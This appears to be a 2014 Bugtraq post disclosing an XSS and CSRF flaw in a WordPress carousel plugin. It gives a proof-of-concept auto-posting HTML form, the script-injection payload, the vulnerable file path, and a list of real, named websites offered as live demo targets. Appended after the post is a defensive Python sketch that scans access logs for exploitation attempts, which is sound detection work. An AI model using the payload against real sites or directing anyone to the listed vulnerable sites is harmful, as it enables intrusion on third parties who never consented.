Message-Id: <201402100725.s1A7PrXG009527@sf01web1.securityfocus.com>
Date: Mon, 10 Feb 2014 07:25:53 GMT
From: iedb.team@...il.com
To: bugtraq@...urityfocus.com
Subject: Wordpress all_in_one_carousel Plugin /XSS/CSRF/ Vuln

# Exploit :

<center><b>Wordpress all_in_one_carousel Plugin Xss & Csrf Vulnerability </center><br><br>
<html>
<head>
<title>Wordpress all_in_one_carousel Plugin Xss & Csrf Vulnerability [IeDb TeaM]</title>
</head><body>
<form action=\"http://YourTarget.Com\" id=\"formid\" method=\"post\">
<input name=\"name\" value=\'\"><script>alert(/IeDb.ir/)</script>\' /><br><br>
<input type=\"submit\" value=\"Submit\"/>
</form></body></html>
#
# XSS Code : \"><script>alert(/IeDb.ir/)</script>
#
# Vulnerable Page :
#
# Localhost/[AnyPath]/wp-content/plugins/all_in_one_carousel/tpl/add_carousel.php
#
#
# [+] Image : http://sectime.ir/myfiles/Xss-wp.png
#
#
#
# D3m0 :
#
# http://www.gaffandigital.com/MattDejanovich/wp-content/plugins/all_in_one_carousel/tpl/add_carousel.php
http://yourworldmotorsports.com/wp-content/plugins/all_in_one_carousel/all_in_one_carousel/tpl/add_carousel.php
http://www.directorphilippemartinez.com/wp-content/plugins/all_in_one_carousel/tpl/add_carousel.php
http://arborhillsgreatdanes.com/wp-content/plugins/all_in_one_carousel/tpl/add_carousel.php
http://www.revsoft.com/wp-content/plugins/all_in_one_carousel/tpl/add_carousel.php
#
#
# Gr33tz : All Members In IeDb.Ir/acc | Thanks : 8ThBit , Dr.3v1l And ....
###########################
# Iranian Exploit DataBase = http://IeDb.Ir [2014-02-04]
###########################
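For site owners triaging this report, the following sketch (an added example, not part of the original post) scans a web server access log for requests to the add_carousel.php template named above and labels what makes each one suspicious. It assumes the Apache/nginx combined log format; the sample lines, host names and reason labels are constructed, and the query-string check goes beyond the POST form shown in the post.

```python
import re
from urllib.parse import urlsplit, unquote, unquote_plus

# Template path reported in the advisory; the prefix before it varies per site.
VULN_PATH = re.compile(r"/all_in_one_carousel/tpl/add_carousel\.php$", re.I)
# Characters that break out of an HTML attribute value once decoded.
MARKUP = re.compile(r"[<>\"']")
# Combined log format (assumed): ip ident user [time] "request" status size "referer" "agent"
LOG_LINE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "[^"]*"')

# Constructed sample lines (documentation IP ranges and .example hosts).
SAMPLE_LOG = """\
203.0.113.7 - - [10/Feb/2014:08:01:12 +0000] "POST /wp-content/plugins/all_in_one_carousel/tpl/add_carousel.php HTTP/1.1" 200 2310 "http://other.example/page.html" "Mozilla/5.0"
198.51.100.4 - - [10/Feb/2014:08:02:40 +0000] "GET /blog/wp-content/plugins/all_in_one_carousel/tpl/add_carousel.php?name=%22%3E%3Cb%3E HTTP/1.1" 200 2298 "-" "Mozilla/5.0"
198.51.100.9 - - [10/Feb/2014:08:03:05 +0000] "GET /wp-admin/admin.php?page=carousel HTTP/1.1" 200 5120 "http://blog.example/wp-admin/" "Mozilla/5.0"
"""

def classify(line, site_host):
    """Return a finding dict for a request to the reported template, else None."""
    m = LOG_LINE.match(line)
    if not m:
        return None
    target = urlsplit(m["target"])
    if not VULN_PATH.search(unquote(target.path)):
        return None
    # Any direct request to the tpl/ file is worth a look.
    reasons = ["direct-template-access"]
    # A POST whose Referer is not the site's own host is consistent with a
    # cross-site form submission (a missing Referer is flagged as well).
    if m["method"] == "POST" and urlsplit(m["referer"]).hostname != site_host.lower():
        reasons.append("post-without-same-site-referer")
    # Decoded markup characters in the query string point at a reflection probe.
    if MARKUP.search(unquote_plus(target.query)):
        reasons.append("markup-in-query")
    return {"ip": m["ip"], "time": m["time"], "status": int(m["status"]), "reasons": reasons}

def scan(log_text, site_host):
    """Classify every line and keep only the findings."""
    findings = (classify(line, site_host) for line in log_text.splitlines())
    return [f for f in findings if f]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG, "blog.example"):
        print(finding)
```

POST bodies are not recorded in access logs, so a submitted name value like the one in the post only becomes visible with request-body logging or a WAF audit log.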